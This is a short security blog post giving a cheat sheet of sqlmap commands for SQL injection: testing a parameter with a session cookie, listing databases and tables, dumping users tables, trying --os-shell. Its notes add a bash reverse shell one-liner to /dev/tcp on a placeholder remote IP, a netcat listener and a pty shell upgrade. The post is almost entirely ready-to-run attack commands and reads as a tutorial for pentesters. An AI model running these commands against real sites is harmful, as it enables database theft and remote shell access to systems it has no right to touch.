Jim83 Blog

Guide to sqlmap tool – sql injection

Install sqlmap using apt

sudo apt install sqlmap

Examples commands

CommandDescription
sqlmap -u ‘http://10.44.13.44/dashboard.php?search=any+query’ –cookie=”PHPSESSID=rcegk9j75j30330937a1srgll1″ test “search” parameter for vulnerabilities
sqlmap -u ‘http://10.44.13.44/dashboard.php?search=any+query’ –cookie=”PHPSESSID=rcegk9j75j30330937a1srgll1″ –os-shelltry to perform command injection
sqlmap -u “https://example.com/login.php” –method POST –data “username=FUZZ&password=FUZZ” –batch –dbsGet a list of databases
sqlmap -u “https://example.com/login.php” –method POST –data “username=FUZZ&password=FUZZ” –tables -D DATABASENAME get a list of tables for database name
sqlmap -u “https://example.com/login.php” –method POST –data “username=FUZZ&password=FUZZ” -D DATABASENAME -batch –dump -T users –force-pivoting Get the contents of users table
sqlmap -r req –batch –dumpautomatically dump all data.
sqlmap -u http://example.com/hackme.php –cookie=”id=1*” –batch –dumpdump all data +use user auth cookies
sqlmap -u “http://www.example.com/?id=2” –banner –current-user –current-db –is-dbaBasic DB Data Enumeration
sqlmap -u “http://www.example.com/?id=2” –tables -D exampleDB retrieval of table names
sqlmap -u “http://www.example.com/?id=2” –dump -T users -D exampleDBDump table content
sqlmap -u “http://www.example.com/?id=2” –dump -T users -D exampleDB -C name,surname –start=2 –stop=3for large tables specify the columns
sqlmap -u “http://www.example.com/?id=1″ –dump -T users -D exampleDB –where=”name LIKE ‘f%'”Conditional Enumeration

Notes

skip the retrieval of content from system databases

--dump-all --exclude-sysdbs 
--dump-all --exclude-sysdbs

To make shell connection much more stable, you can use the flowing payload

bash -c "bash -i >& /dev/tcp/{your remote IP address}/1234 0>&1"

open listener port 1234 on your remote machine using netcat

sudo nc -lvnp 1234

after you get foothold make your shell fully interactive

python3 -c 'import pty; pty.spawn("/bin/bash")'

Screenshots

[envira-gallery id=’6720′]

Like this article?

You may also enjoy these articles

SearchSploit: Guide to Exploit Database Search

July 14, 2022 No Comments

Searchsploit is a command-line tool that allows users to search the Exploit Database, which is a repository of publicly disclosed vulnerabilities and exploitation techniques. It

fuzzing with ffuf tool

Guide to FFUF tool – Web Application Fuzzing

June 28, 2022 No Comments

FFUF is a powerful and flexible open-source tool for performing web application fuzzing. Whether you’re a security professional looking to identify vulnerabilities or a developer

Hydra

June 16, 2022 No Comments

Hydra tool make password cracking to easy task, hydra can brute Force multiple protocols and services like ftp irc ldap2[s] ldap3 mongodb mssql mysql

Join our free newsletter for daily security updates

Follow Us

All rights reserved SMARTIOT 2023 | WE LOVE YOU GOOGLEBOT

Scroll to Top